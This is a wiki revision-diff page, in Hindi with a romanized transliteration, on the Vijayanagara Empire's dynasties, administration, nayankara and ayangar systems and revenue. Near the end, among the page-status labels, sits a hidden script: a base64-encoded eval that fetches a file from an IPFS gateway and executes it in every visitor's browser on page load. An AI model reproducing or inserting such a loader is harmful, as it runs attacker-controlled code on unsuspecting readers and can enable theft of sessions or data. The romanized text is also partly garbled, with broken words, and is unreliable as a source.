Difference between revisions of "विजय नगर साम्राज्य"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 93: Line 93:
 
केन्द्र में 'दण्डनायक' नाम का उच्च अधिकारी होता था। उसका यह पद पदबोधक न होकर विभिन्न अधिकारियों की विशेष श्रेणी को इंगित करता था। दंडनायक का अर्थ, ‘प्रशासन का प्रमुख’ और ‘सेनाओं का नायक’ होता था। कहीं-कहीं मंत्रियों को भी दंडनायक की उपाधि प्रदान किये जाने का उल्लेख मिलता है। दण्डनायक को न्यायधीश, सेनापति, गर्वनर या प्रशासकीय अधिकारी आदि का कार्यभार सौंपा जा सकता था। कुछ अन्य अधिकारियों को ‘कार्यकर्ता’ कहा जाता था। केन्द्र में एक सचिवालय की व्यवस्था होती थी, जिसमें विभागों का वर्गीकरण किया जाता था। इन विभागों में ‘रायसम’ या सचिव, कर्णिकम या एकाउन्टेंट होते थे। रायसम राजा के मौखिक अधिकारों को लिपिबद्ध करता था। अन्य विभाग एवं उनके अधिकारी ‘मानिय प्रधान’, गृहमंत्री, मुद्राकर्ता, शाही-मुद्रा को रखने वाला अधिकारी आदि थे।
 
केन्द्र में 'दण्डनायक' नाम का उच्च अधिकारी होता था। उसका यह पद पदबोधक न होकर विभिन्न अधिकारियों की विशेष श्रेणी को इंगित करता था। दंडनायक का अर्थ, ‘प्रशासन का प्रमुख’ और ‘सेनाओं का नायक’ होता था। कहीं-कहीं मंत्रियों को भी दंडनायक की उपाधि प्रदान किये जाने का उल्लेख मिलता है। दण्डनायक को न्यायधीश, सेनापति, गर्वनर या प्रशासकीय अधिकारी आदि का कार्यभार सौंपा जा सकता था। कुछ अन्य अधिकारियों को ‘कार्यकर्ता’ कहा जाता था। केन्द्र में एक सचिवालय की व्यवस्था होती थी, जिसमें विभागों का वर्गीकरण किया जाता था। इन विभागों में ‘रायसम’ या सचिव, कर्णिकम या एकाउन्टेंट होते थे। रायसम राजा के मौखिक अधिकारों को लिपिबद्ध करता था। अन्य विभाग एवं उनके अधिकारी ‘मानिय प्रधान’, गृहमंत्री, मुद्राकर्ता, शाही-मुद्रा को रखने वाला अधिकारी आदि थे।
 
==प्रांतीय प्रशासन==
 
==प्रांतीय प्रशासन==
[[विजयनगर साम्राज्य]] का विभाजन प्रान्त, राज्य या मंडल में किया गया था। [[कृष्णदेव राय]] के शासनकाल में प्रान्तों की संख्या सर्वाधिक 6 थी। प्रान्तों के गर्वनर के रूप में राज परिवार के सदस्य या अनुभवी दण्डनायकों की नियुक्ति की जाती थी। इन्हें सिक्कों को प्रसारित करने, नये कर लगाने, पुराने कर माफ करने एवं भूमिदान करने आदि की स्वतन्त्रता प्राप्त थी। प्रान्त के गर्वनर को 'भू-राजस्व' का एक निश्चित हिस्सा केन्द्र सरकार को देना होता था।
+
'''विजयनगर साम्राज्य का विभाजन''' प्रान्त, राज्य या मंडल में किया गया था। [[कृष्णदेव राय]] के शासनकाल में प्रान्तों की संख्या सर्वाधिक 6 थी। प्रान्तों के गर्वनर के रूप में राज परिवार के सदस्य या अनुभवी दण्डनायकों की नियुक्ति की जाती थी। इन्हें सिक्कों को प्रसारित करने, नये कर लगाने, पुराने कर माफ करने एवं भूमिदान करने आदि की स्वतन्त्रता प्राप्त थी। प्रान्त के गर्वनर को 'भू-राजस्व' का एक निश्चित हिस्सा केन्द्र सरकार को देना होता था।
 +
 
 +
{| class="bharattable-green" border="1" style="margin:5px; float:right"
 +
|+ अरविडु वंश
 +
! शासक
 +
! कार्यकाल
 +
|-
 +
| तिरुमल
 +
| (1570-1572 ई.)
 +
|-
 +
| श्रीरंग
 +
| (1572-1585 ई.)
 +
|-
 +
| वेंकट प्रथम
 +
| (1585-1614 ई.)
 +
|-
 +
| श्रीरंग प्रथम
 +
| (1614 ई.)
 +
|-
 +
| रामदेव
 +
| (1614-1630 ई.)
 +
|-
 +
| वेंकट द्वितीय
 +
| (1630-1642 ई.)
 +
|-
 +
| श्रीरंग द्वितीय
 +
| (1642-1652 ई.)
 +
|-
 +
|}
  
 
प्रान्त को ‘मंडल’ एवं मंडल को ‘कोट्म’ या ‘ज़िले’ में विभाजित किया गया था। कोट्टम को ‘वलनाडु’ भी कहा जाता था। कोट्टम का विभाजन ‘नाडुओं’ में हुआ था, जिसकी स्थिति आज के परगना एवं ताल्लुका जैसी थी। नाडुओं को ‘मेंलाग्राम’ में बाँटा गया था। एक मेलाग्राम के अन्तर्गत लगभग 50 गाँव होते थे। ‘उर’ या ‘ग्राम’ प्रशासन की सबसे छोटी ईकाई थी। इस सम गांवों के समूह को ‘स्थल’ एवं ‘सीमा’ भी कहा जाता था। विभाजन का क्रम इस प्रकार था।<br />
 
प्रान्त को ‘मंडल’ एवं मंडल को ‘कोट्म’ या ‘ज़िले’ में विभाजित किया गया था। कोट्टम को ‘वलनाडु’ भी कहा जाता था। कोट्टम का विभाजन ‘नाडुओं’ में हुआ था, जिसकी स्थिति आज के परगना एवं ताल्लुका जैसी थी। नाडुओं को ‘मेंलाग्राम’ में बाँटा गया था। एक मेलाग्राम के अन्तर्गत लगभग 50 गाँव होते थे। ‘उर’ या ‘ग्राम’ प्रशासन की सबसे छोटी ईकाई थी। इस सम गांवों के समूह को ‘स्थल’ एवं ‘सीमा’ भी कहा जाता था। विभाजन का क्रम इस प्रकार था।<br />
Line 101: Line 129:
 
सामान्यतः प्रान्तों में राजपरिवार के व्यक्तियों (कुमार या राजकुमार) को ही नियुक्त किया जाता था। गर्वनरों को सिक्के जारी करने, नये कर लगाने, पुराने करों को माफ करने, भूमिदान देने जैसे अधिकार प्राप्त थे। संगम युग में गर्वनरों के रूप में शासन करने वाले राजकुमारों को 'उरैयर' की उपाधि मिली हुई थी। चोल युग और विजयनगर युग के राजतंत्र में सबसे बड़ा अन्तर 'नायंकार व्यवस्था' थी।
 
सामान्यतः प्रान्तों में राजपरिवार के व्यक्तियों (कुमार या राजकुमार) को ही नियुक्त किया जाता था। गर्वनरों को सिक्के जारी करने, नये कर लगाने, पुराने करों को माफ करने, भूमिदान देने जैसे अधिकार प्राप्त थे। संगम युग में गर्वनरों के रूप में शासन करने वाले राजकुमारों को 'उरैयर' की उपाधि मिली हुई थी। चोल युग और विजयनगर युग के राजतंत्र में सबसे बड़ा अन्तर 'नायंकार व्यवस्था' थी।
 
==नायंकार व्यवस्था==
 
==नायंकार व्यवस्था==
'''इस व्यवस्था की उत्पत्ति के बारे में''' इतिहासकारों में मतभेद हैं। कुछ का मानना है कि, [[विजयनगर साम्राज्य]] की सेना के सेनानायकों को ‘नायक’ कहा जाता था, कुछ का मानना है कि, नायक भू-सामन्त होते थे, जिन्हें वेतन के बदले एवं स्थानीय सेना के ख़र्च को चलाने के लिए विशेष भू-खण्ड, जिसे ‘अमरम’ कहा जाता था, दिया जाता था। चूंकि ये अमरम भूमि का प्रयोग करते थे, इसलिए इन्हे ‘अमरनायक’ भी कहा जाता था। अमरम भूमि की आय का एक हिस्सा केन्द्रीय सरकार के कोष के लिए देना होता था। नायक को अमरम भूमि में शांति, सुरक्षा एवं अपराधों को रोकने के दायित्व का भी निर्वाह करना होता था। इसके अतिरिक्त उसे जंगलों को साफ करवाना एवं [[कृषि]] योग्य भूमि का विस्तार भी करना होता था। नायंकारों के आंतरिक मामलों में राजा हस्तक्षेप नहीं कर सकता था। इनका पद आनुवंशिक होता था। नायकों का स्थानान्तरण नहीं होता था। राजधानी में नायकों के दो सम्पर्क अधिकारी - एक नायक की सेना का सेनापति और दूसरा प्रशासनिक अभिकर्ता ‘स्थानपति’ रहते थे। [[अच्युतदेव राय]] ने नायकों की उच्छृंखता को रोकने के लिए ‘मंहामंडलेश्वर’ या 'विशेष कमिश्नरों' की नियुक्त की थी। नायंकार व्यवस्था में पर्याप्त रूप में सामंतवादी लक्षण थे, जो विजयनगर साम्राज्य के पतन का कारण बनी।  
+
'''इस व्यवस्था की उत्पत्ति के बारे में''' इतिहासकारों में मतभेद हैं। कुछ का मानना है कि, विजयनगर साम्राज्य की सेना के सेनानायकों को ‘नायक’ कहा जाता था, कुछ का मानना है कि, नायक भू-सामन्त होते थे, जिन्हें वेतन के बदले एवं स्थानीय सेना के ख़र्च को चलाने के लिए विशेष भू-खण्ड, जिसे ‘अमरम’ कहा जाता था, दिया जाता था। चूंकि ये अमरम भूमि का प्रयोग करते थे, इसलिए इन्हे ‘अमरनायक’ भी कहा जाता था। अमरम भूमि की आय का एक हिस्सा केन्द्रीय सरकार के कोष के लिए देना होता था। नायक को अमरम भूमि में शांति, सुरक्षा एवं अपराधों को रोकने के दायित्व का भी निर्वाह करना होता था। इसके अतिरिक्त उसे जंगलों को साफ करवाना एवं [[कृषि]] योग्य भूमि का विस्तार भी करना होता था। नायंकारों के आंतरिक मामलों में राजा हस्तक्षेप नहीं कर सकता था। इनका पद आनुवंशिक होता था। नायकों का स्थानान्तरण नहीं होता था। राजधानी में नायकों के दो सम्पर्क अधिकारी - एक नायक की सेना का सेनापति और दूसरा प्रशासनिक अभिकर्ता ‘स्थानपति’ रहते थे। [[अच्युतदेव राय]] ने नायकों की उच्छृंखता को रोकने के लिए ‘मंहामंडलेश्वर’ या 'विशेष कमिश्नरों' की नियुक्त की थी। नायंकार व्यवस्था में पर्याप्त रूप में सामंतवादी लक्षण थे, जो विजयनगर साम्राज्य के पतन का कारण बनी।
 +
==आयंगर व्यवस्था==
 +
'''प्रशासन को सुचारू रूप से संचालित''' करने के लिए प्रत्येक ग्राम को एक स्वतन्त्र इकाई के रूप में संगठित किया गया था। इन संगठित ग्रामीण इकाइयों पर शासन हेतु एक 12 प्रशासकीय अधिकारियों की नियुक्ति की जाती थी, जिनकों सामूहिक रूप से ‘आयंगार’ कहा जाता था। ये अवैतनिक होते थे। इनकी सेवाओं के बदले सरकार इन्हे पूर्णतः कर मुक्त एवं लगान मुक्त भूमि प्रदान करती थी। इनका पद ‘आनुवंशिक’ होता था। यह अपने पद को किसी दूसरे व्यक्ति को बेच या गिरवी रख सकता था। ग्राम स्तर की कोई भी सम्पत्ति या भूमि इन अधिकारियों की इजाजत के बगैर न तो बेची जा सकती थी, और न ही दान दी जा सकती थी। 'कर्णिक' नामक आयंगार के पास ज़मीन के क्रय एवं विक्रय से सम्बन्धित समस्त दस्तावेज होते थे। इस व्यवस्था ने ग्रामीण स्वतंत्रता का गला घोंट दिया।
 +
==स्थानीय प्रशासन==
 +
'''विजयनगर काल में''' [[चोल राजवंश|चोल]] कालीन सभा को कहीं-कहीं 'महासभा', 'उर' एवं 'महाजन' कहा जाता था। गाँव को अनेक वार्डों या मुहल्लों में विभाजित किया गया था। ‘सभा’ में विचार-विर्मश के लिए गाँव या क्षेत्र विशेष के लोग भाग लेते थे। ‘सभा’ नई भूमि या अन्य प्रकार की सम्पत्ति उपलब्ध कराने, गाँव की सार्वजनिक भूमि को बेचने, ग्रामीण की तरफ़ से सामूहिक निर्णय लेने, गाँव की भूमि को दान में देने के अधिकार अपने पास सुरक्षित रखती थी। यदि कोई भूमि स्वामी लम्बे समय तक लगान नहीं दे पाता था तो, ग्राम सभाएँ उसकी ज़मीन जब्त कर लेती थीं। न्यायिक अधिकारों के अन्तर्गत सभा के पास दीवानी मुकद्दमों एवं फौजदारी के छोटे-छोटे मामलों का निर्णय करने का अधिकार होता था। ‘नाडु’ गाँव की बड़ी राजनीतिक इकाई के रूप में प्रचलित थी। नाडु की सभा को नाडु एवं सदस्यों को ‘नात्वार’ कहा जाता था। अधिकार क्षेत्र काफ़ी विस्तृत होते थे, पर शासकीय नियंत्रण में रहना पड़ता था। विजयनगर के शासन काल में इन स्थानीय इकाइयों का ह्मस हुआ। ‘सेनेटेओवा’ गाँव के आय-व्यय की देखभाल करता था, ‘तलरी’ गांव के चौकीदार को कहते थे। ‘बेगरा’ गाँव में बेगार, मजदूरी आदि की देखभाल करता था। ब्रह्मदेव ग्रामों (ब्राह्मणों को भूमि-अनुदान के रूप में प्राप्त ग्राम) की सभाओं को 'चतुर्वेदीमंगलम' कहा गया है। ग़ैर ब्रह्मदेव ग्राम की सभा 'उर' कहलाती थी।
 +
 
 +
'''इस समय आय के प्रमुख स्रोत थे''' - लगान, सम्पत्ति कर, व्यवसायिक कर, उद्यागों पर कर, सिंचाई कर, चरागाह कर, उद्यान कर एवं अनेक प्रकार के अर्थ दण्ड।
 +
==भू-राजस्व व्यवस्था==
 +
'''विजयनगर साम्राज्य द्वारा वसूल किये''' जाने वाले विविध करों के नाम थे - 'कदमाई', 'मगमाइ', 'कनिक्कई', 'कत्तनम', 'कणम', 'वरम', 'भोगम', 'वारिपत्तम', 'इराई' और 'कत्तायम'। ‘शिष्ट’ नामक भूमिकर विजयनगर राज्य की आय का प्रमुख एवं सबसे बड़ा स्रोत था। राज्य उपज का 1/6 भाग कर के रूप में वसूल करता था। [[कृष्णदेव राय]] के शासन काल में भूमि का एक व्यापक सर्वेक्षण करवाया गया तथा भूमि की उर्वरता के अनुसार उपज का 1/3 या 1/6 भाग कर के रूप में निर्धारित किया गया। सम्भवतः राजस्व की दर विभिन्न प्रान्तों में अलग-अलग थी। आय का एक अन्य स्रोत था - सिंचाई कर, जिसे [[तमिलनाडु|तमिल]] प्रदेश में ‘दासावन्दा’ एवं [[आन्ध्र प्रदेश]] व [[कर्नाटक]] में ‘कट्टकोडेज’ कहा गया। यह कर उन व्यक्तियों से लिया जाता था, जो सिंचाई के साधनों का उपयोग करते थे। ब्राह्मणों के अधिकार वाली भूमि से उपज का 20 वाँ भाग तथा मंदिरों की भूमि से उपज का 30वाँ भाग लगान के रूप में वसूला जाता था। विजयनगर साम्राज्य में कोई ऐसा वर्ग नहीं था, जिससे व्यवसायिक कर नहीं लिया जाता हो। रामराय ने केवल नाइयों को व्यावसायिक कर से मुक्त कर दिया। केन्द्रीय राजस्व विभाग को अठनवे (अयवन) कहा जाता था।
 +
 
 +
सामाजिक एवं सामुदायिक कर के रूप में विवाह कर लिया जाता था। विधवा से विवाह करने वाले इस कर से मुक्त होते थे। कृष्णदेव राय ने विवाह कर को समाप्त कर दिया था। राज्य का राजस्व वस्तु एवं नकद दोनों ही रूपों में वसूल किया जाता था। विजयनगर काल में मंदिरों की महत्वपूर्ण भूमिका होती थी। वे सिंचाई परियोजनाओं के साथ-साथ बैंकिग गतिविधियों का संचालन भी करते थे। इनके पास सुरक्षित भूमि को देवदान अनुदान कहा जाता था। एक शिलालेख के उल्लेख के आधार पर माना जाता है कि, इस समय मंदिरों में लगभग 370 नौकर होते थे। भंडारवाद ग्राम वे ग्राम थे, जिनकी भूमि सीधे राज्य के नियंत्रण में थी। यहाँ के किसान राज्य को कर देते थे।
 +
 
 +
 
 +
 
 +
 
 +
 
 +
  
 
{{प्रचार}}
 
{{प्रचार}}

Revision as of 08:43, 27 March 2011

vijayanagar ka shabdik arth hai- ‘jit ka shahar’. prayah is nagar ko madhyayug ka pratham hindoo samrajy mana jata hai. 14 vian shatabdi mean utpann vijayanagar samrajy ko madhyayug aur adhunik aupaniveshik kal ke bich ka sankranti-kal kaha jata hai. is samrajy ki sthapana 1336 ee. mean dakshin bharat mean tugalaq satta ke viruddh hone vale rajanitik tatha saanskritik andolan ke parinamasvaroop sangam putr harihar evan bukka dvara tuangabhadra nadi ke uttari tat par sthit aneguandi durg ke sammukh ki gayi. apane is sahasik kary mean unhean brahman vidvan madhav vidyarany tatha vedoan ke prasiddh bhashyakar sayan se prerana mili. vijayanagar samrajy ka nam tuangabhadra nadi ke dakshin kinare par sthit usaki rajadhani ke nam par p da. usaki rajadhani vipul shakti evan sampada ki pratik thi. vijayanagar ke vishay mean farasi yatri abdul rajjak ne likha hai ki, "vijayanagar duniya ke sabase bhavy shaharoan mean se ek laga, jo usane dekhe ya sune the".

utpatti matabhed

vijayanagar samrajy ke sansthapakoan ki utpatti ke bare mean spasht janakari ke abhav mean itihasakaroan mean vivad hai. kuchh vidvan ‘telugu andhr’ athava kakatiy utpatti manate haian, to kuchh 'karnata' (karnatak) ya hoyasal tatha kuchh 'kampili' utpatti manate haian. harihar aur bukka ne apane pita sangam ke nam par sangam rajavansh ki sthapana ki. vijayanagar samrajy ki rajadhaniyaan kramash: aneguandi ya anegondi, vijayanagar, penugonda tatha chandragiri thian. hampi (hastinavati) vijayanagar ki purani rajadhani ka pratinidhitv karata hai. vijayanagar ka vartaman nam 'hampi' (hastinavati) hai.

sangam vansh
shasak shasanakal
harihar pratham (1336-1356 ee.)
bukka pratham (1356-1377 ee.)
harihar dvitiy (1377-1404 ee.)
virupaksh pratham (1404 ee.)
bukka dvitiy (1404-1406 ee.)
devaray pratham (1406-1422 ee.)
devaray dvitiy (1422-1446 ee.)
vijayaray dvitiy (1446-1447 ee.)
mallikarjun (1447-1465 ee.)
virupaksh dvitiy (1465-1485 ee.)

vijayanagar ke rajavansh

vijayanagar samrajy par jin rajavanshoan ne shasan kiya, ve nimnalikhit haian-

  1. sangam vansh - 1336-1485 ee.
  2. saluv vansh - 1485-1505 ee.
  3. tuluv vansh - 1505-1570 ee.
  4. aravidu vansh - 1570-1650 ee.

vijayanagar ka prashasan

vijasanagar samrajy ke rajanitik svaroop ke bare mean do prakar ke mat milate haian. e.ke. shastri ke anusar- ‘vijayanagar samrajy ek kendrikrit rajy tha. isake viparit bartanasten vijayanagar ko khandit rajy ka darja dete haian. kul milakar vijayanagar samrajy ka rajanitik svaroop khandit hone ke bajay atyadhit vistrit evan sanbhajit tha.

kendriy vyavastha

vijayanagar samrajy ki shasan paddhati rajatantratmak thi. rajy evan shasan ke mool ko raja, jise 'ray' kaha jata tha, hota tha. is kal mean prachin rajy ki ‘saptaang vicharadhara’ ka anusaran kiya jata tha. raja ke chunav mean rajy ke mantri evan nayak mahatvapoorn bhoomika ka nirvah karate the. vijayanagar mean sanyukt shasak ki bhi parampara thi. raja ko rajyabhishek ke samay prajapalan evan nishtha ki shapath leni p dati thi. rajyabhishek ke avasar par darabar mean atyant bhavy ayojan hota tha, jisamean nayak, adhikari tatha janata ke pratinidhi sammilit hote the. achyutadev ray ne apana rajyabhishek tirupati veankateshvar mandir mean sampann karaya tha. raja ke bad ‘yuvaraj’ ka pad hota tha. yuvaraj raja ka b da putr v rajy parivar ka koee bhi yogy purush ban sakata tha. yuvaraj ke rajyabhishek ko 'yuvaraj pattabhishek' kahate the. vijayanagar mean sanyukt shasan ki parampara bhi vidyaman thi, jaise - harihar pratham evan bukka pratham. yuvaraj ke alpayu hone ki sthiti mean raja apane jivan kal mean hi svayan kisi mantri ko usaka sanrakshak niyukt karata tha. is kal mean kuchh mahatvapoorn sanrakshak the - vir narasianh, narasa nayak evan ramaray adi. kalantar mean yahi sanrakshak vyavastha hi vijayanagar ke patan mean bahut kuchh zimmedar rahi. vijayanagar ke rajaoan ne apane vyaktigat dharm ke bad bhi dharmik sahishnuta ki niti ka anusaran kiya. yadyapi rajy nirankush hota tha, par barbar nahian. usaki nirankushata par niyantran tatha prashasanik karyoan mean sahayog karane ke lie ek ‘mantriparishad’ hoti thi, jisamean pradhanamantri, mantri, upamantri, vibhagoan ke adhyaksh tatha rajy ke kuchh nazadik ke sambandhi hote the.

saluv vansh
shasak karyakal
saluv narasianh (1485-1491 ee.)
timma ray (1491 ee.)
immadi narasianh (1491-1505 ee.).

mantriparishad

mantriyoan ke chayan mean anuvanshikata ki parampara ka palan hota tha. mantriparishad ke mukhy adhikari ko ‘pradhani’ ya ‘mahapradhani’ kaha jata tha. isaki sthiti pradhanamantri jaisi thi. isaki tulana maratha kalin peshava se ki ja sakati hai. yah raja evan yuvaraj ke bad tisare sthan par hota tha. mantriparishad mean kul 20 sadasy hote the. mantriparishad ke adhyaksh ko ‘sabhanayak’ kaha jata tha. kabhi-kabhi pradhanamantri adhyakshata bhi karata tha. ti.vi. mahaliangam ne vijayanagar prashasan ki rajaparishad aur mantriparishad mean antar spasht kiya hai. rajaparishad prantoan ke nayakoan, samant shasakoan, viddhanoan v rajyoan ke rajadootoan ko shamil karake gathit kiya gaya ek vishal sangathan hota tha. vijayanagar kalin mantriparishad ki tulana kautily ke mantriparishad ke sath ki ja sakati hai.

tuluv vansh
shasak karyakal
vir narasianh (1505-1509 ee.)
krishnadev ray (1509-1529 ee.)
achyutadev ray (1529-1542 ee.)
veankat pratham (1542 ee.)
sadashiv ray (1542-1570 ee.)

kendr mean 'dandanayak' nam ka uchch adhikari hota tha. usaka yah pad padabodhak n hokar vibhinn adhikariyoan ki vishesh shreni ko iangit karata tha. dandanayak ka arth, ‘prashasan ka pramukh’ aur ‘senaoan ka nayak’ hota tha. kahian-kahian mantriyoan ko bhi dandanayak ki upadhi pradan kiye jane ka ullekh milata hai. dandanayak ko nyayadhish, senapati, garvanar ya prashasakiy adhikari adi ka karyabhar sauanpa ja sakata tha. kuchh any adhikariyoan ko ‘karyakarta’ kaha jata tha. kendr mean ek sachivalay ki vyavastha hoti thi, jisamean vibhagoan ka vargikaran kiya jata tha. in vibhagoan mean ‘rayasam’ ya sachiv, karnikam ya ekaunteant hote the. rayasam raja ke maukhik adhikaroan ko lipibaddh karata tha. any vibhag evan unake adhikari ‘maniy pradhan’, grihamantri, mudrakarta, shahi-mudra ko rakhane vala adhikari adi the.

praantiy prashasan

vijayanagar samrajy ka vibhajan prant, rajy ya mandal mean kiya gaya tha. krishnadev ray ke shasanakal mean prantoan ki sankhya sarvadhik 6 thi. prantoan ke garvanar ke roop mean raj parivar ke sadasy ya anubhavi dandanayakoan ki niyukti ki jati thi. inhean sikkoan ko prasarit karane, naye kar lagane, purane kar maph karane evan bhoomidan karane adi ki svatantrata prapt thi. prant ke garvanar ko 'bhoo-rajasv' ka ek nishchit hissa kendr sarakar ko dena hota tha.

aravidu vansh
shasak karyakal
tirumal (1570-1572 ee.)
shrirang (1572-1585 ee.)
veankat pratham (1585-1614 ee.)
shrirang pratham (1614 ee.)
ramadev (1614-1630 ee.)
veankat dvitiy (1630-1642 ee.)
shrirang dvitiy (1642-1652 ee.)

prant ko ‘mandal’ evan mandal ko ‘kotm’ ya ‘zile’ mean vibhajit kiya gaya tha. kottam ko ‘valanadu’ bhi kaha jata tha. kottam ka vibhajan ‘naduoan’ mean hua tha, jisaki sthiti aj ke paragana evan talluka jaisi thi. naduoan ko ‘meanlagram’ mean baanta gaya tha. ek melagram ke antargat lagabhag 50 gaanv hote the. ‘ur’ ya ‘gram’ prashasan ki sabase chhoti eekaee thi. is sam gaanvoan ke samooh ko ‘sthal’ evan ‘sima’ bhi kaha jata tha. vibhajan ka kram is prakar tha.

  1. prant - mandal-kottam ya valanadu
  2. prakottam - nadu-melagram-ur ya gram.

samanyatah prantoan mean rajaparivar ke vyaktiyoan (kumar ya rajakumar) ko hi niyukt kiya jata tha. garvanaroan ko sikke jari karane, naye kar lagane, purane karoan ko maph karane, bhoomidan dene jaise adhikar prapt the. sangam yug mean garvanaroan ke roop mean shasan karane vale rajakumaroan ko 'uraiyar' ki upadhi mili huee thi. chol yug aur vijayanagar yug ke rajatantr mean sabase b da antar 'nayankar vyavastha' thi.

nayankar vyavastha

is vyavastha ki utpatti ke bare mean itihasakaroan mean matabhed haian. kuchh ka manana hai ki, vijayanagar samrajy ki sena ke senanayakoan ko ‘nayak’ kaha jata tha, kuchh ka manana hai ki, nayak bhoo-samant hote the, jinhean vetan ke badale evan sthaniy sena ke kharch ko chalane ke lie vishesh bhoo-khand, jise ‘amaram’ kaha jata tha, diya jata tha. chooanki ye amaram bhoomi ka prayog karate the, isalie inhe ‘amaranayak’ bhi kaha jata tha. amaram bhoomi ki ay ka ek hissa kendriy sarakar ke kosh ke lie dena hota tha. nayak ko amaram bhoomi mean shaanti, suraksha evan aparadhoan ko rokane ke dayitv ka bhi nirvah karana hota tha. isake atirikt use jangaloan ko saph karavana evan krishi yogy bhoomi ka vistar bhi karana hota tha. nayankaroan ke aantarik mamaloan mean raja hastakshep nahian kar sakata tha. inaka pad anuvanshik hota tha. nayakoan ka sthanantaran nahian hota tha. rajadhani mean nayakoan ke do sampark adhikari - ek nayak ki sena ka senapati aur doosara prashasanik abhikarta ‘sthanapati’ rahate the. achyutadev ray ne nayakoan ki uchchhriankhata ko rokane ke lie ‘manhamandaleshvar’ ya 'vishesh kamishnaroan' ki niyukt ki thi. nayankar vyavastha mean paryapt roop mean samantavadi lakshan the, jo vijayanagar samrajy ke patan ka karan bani.

ayangar vyavastha

prashasan ko sucharoo roop se sanchalit karane ke lie pratyek gram ko ek svatantr ikaee ke roop mean sangathit kiya gaya tha. in sangathit gramin ikaiyoan par shasan hetu ek 12 prashasakiy adhikariyoan ki niyukti ki jati thi, jinakoan samoohik roop se ‘ayangar’ kaha jata tha. ye avaitanik hote the. inaki sevaoan ke badale sarakar inhe poornatah kar mukt evan lagan mukt bhoomi pradan karati thi. inaka pad ‘anuvanshik’ hota tha. yah apane pad ko kisi doosare vyakti ko bech ya giravi rakh sakata tha. gram star ki koee bhi sampatti ya bhoomi in adhikariyoan ki ijajat ke bagair n to bechi ja sakati thi, aur n hi dan di ja sakati thi. 'karnik' namak ayangar ke pas zamin ke kray evan vikray se sambandhit samast dastavej hote the. is vyavastha ne gramin svatantrata ka gala ghoant diya.

sthaniy prashasan

vijayanagar kal mean chol kalin sabha ko kahian-kahian 'mahasabha', 'ur' evan 'mahajan' kaha jata tha. gaanv ko anek vardoan ya muhalloan mean vibhajit kiya gaya tha. ‘sabha’ mean vichar-virmash ke lie gaanv ya kshetr vishesh ke log bhag lete the. ‘sabha’ nee bhoomi ya any prakar ki sampatti upalabdh karane, gaanv ki sarvajanik bhoomi ko bechane, gramin ki taraf se samoohik nirnay lene, gaanv ki bhoomi ko dan mean dene ke adhikar apane pas surakshit rakhati thi. yadi koee bhoomi svami lambe samay tak lagan nahian de pata tha to, gram sabhaean usaki zamin jabt kar leti thian. nyayik adhikaroan ke antargat sabha ke pas divani mukaddamoan evan phaujadari ke chhote-chhote mamaloan ka nirnay karane ka adhikar hota tha. ‘nadu’ gaanv ki b di rajanitik ikaee ke roop mean prachalit thi. nadu ki sabha ko nadu evan sadasyoan ko ‘natvar’ kaha jata tha. adhikar kshetr kafi vistrit hote the, par shasakiy niyantran mean rahana p data tha. vijayanagar ke shasan kal mean in sthaniy ikaiyoan ka hmas hua. ‘seneteova’ gaanv ke ay-vyay ki dekhabhal karata tha, ‘talari’ gaanv ke chaukidar ko kahate the. ‘begara’ gaanv mean begar, majadoori adi ki dekhabhal karata tha. brahmadev gramoan (brahmanoan ko bhoomi-anudan ke roop mean prapt gram) ki sabhaoan ko 'chaturvedimangalam' kaha gaya hai. gair brahmadev gram ki sabha 'ur' kahalati thi.

is samay ay ke pramukh srot the - lagan, sampatti kar, vyavasayik kar, udyagoan par kar, sianchaee kar, charagah kar, udyan kar evan anek prakar ke arth dand.

bhoo-rajasv vyavastha

vijayanagar samrajy dvara vasool kiye jane vale vividh karoan ke nam the - 'kadamaee', 'magamai', 'kanikkee', 'kattanam', 'kanam', 'varam', 'bhogam', 'varipattam', 'iraee' aur 'kattayam'. ‘shisht’ namak bhoomikar vijayanagar rajy ki ay ka pramukh evan sabase b da srot tha. rajy upaj ka 1/6 bhag kar ke roop mean vasool karata tha. krishnadev ray ke shasan kal mean bhoomi ka ek vyapak sarvekshan karavaya gaya tatha bhoomi ki urvarata ke anusar upaj ka 1/3 ya 1/6 bhag kar ke roop mean nirdharit kiya gaya. sambhavatah rajasv ki dar vibhinn prantoan mean alag-alag thi. ay ka ek any srot tha - sianchaee kar, jise tamil pradesh mean ‘dasavanda’ evan andhr pradesh v karnatak mean ‘kattakodej’ kaha gaya. yah kar un vyaktiyoan se liya jata tha, jo sianchaee ke sadhanoan ka upayog karate the. brahmanoan ke adhikar vali bhoomi se upaj ka 20 vaan bhag tatha mandiroan ki bhoomi se upaj ka 30vaan bhag lagan ke roop mean vasoola jata tha. vijayanagar samrajy mean koee aisa varg nahian tha, jisase vyavasayik kar nahian liya jata ho. ramaray ne keval naiyoan ko vyavasayik kar se mukt kar diya. kendriy rajasv vibhag ko athanave (ayavan) kaha jata tha.

samajik evan samudayik kar ke roop mean vivah kar liya jata tha. vidhava se vivah karane vale is kar se mukt hote the. krishnadev ray ne vivah kar ko samapt kar diya tha. rajy ka rajasv vastu evan nakad donoan hi roopoan mean vasool kiya jata tha. vijayanagar kal mean mandiroan ki mahatvapoorn bhoomika hoti thi. ve sianchaee pariyojanaoan ke sath-sath baiankig gatividhiyoan ka sanchalan bhi karate the. inake pas surakshit bhoomi ko devadan anudan kaha jata tha. ek shilalekh ke ullekh ke adhar par mana jata hai ki, is samay mandiroan mean lagabhag 370 naukar hote the. bhandaravad gram ve gram the, jinaki bhoomi sidhe rajy ke niyantran mean thi. yahaan ke kisan rajy ko kar dete the.





panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh